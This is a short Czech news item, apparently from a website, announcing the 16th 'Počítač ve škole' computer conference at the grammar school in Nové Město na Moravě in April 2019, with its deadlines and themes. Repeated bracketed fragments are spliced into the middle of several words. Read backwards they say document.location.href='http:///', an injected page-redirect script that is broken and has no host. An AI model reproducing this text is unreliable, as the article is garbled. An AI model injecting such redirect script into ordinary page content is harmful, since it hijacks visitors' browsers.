Rainbow page separator

Novoměstské gymnázium bude opět hostit počítačovou konferenci

Pátek, 15. března 2019

Gymnázium Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Celostátní konference nazvaná Počítač ve škole se už pošestnácté uskuteční v Gymnáziu Vincence Makovského se spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovními třídami v Novém Městě na Moravě. Akce se odehraje ve dnech 16. až 18. dubna. Zájemci o přednášku, případně workshop mohou svá vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení přihlásit nejpozději do 20. března, registrace účastníků je možná do 9. dubna.
Hlavními tématy le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního ročníku konference Počítač ve škole jsou algoritmizace a robotika, informační a vzdělávací portály škol, mapování s podporou ICT a také multimédia ve škole. Převážná část programu bude věnována ukázkám různých možností využívání digitálních technologií ve výuce v základních a středních školách. Při konferenci se taktéž představí zástupci firem dodávajících software a počítačovou techniku.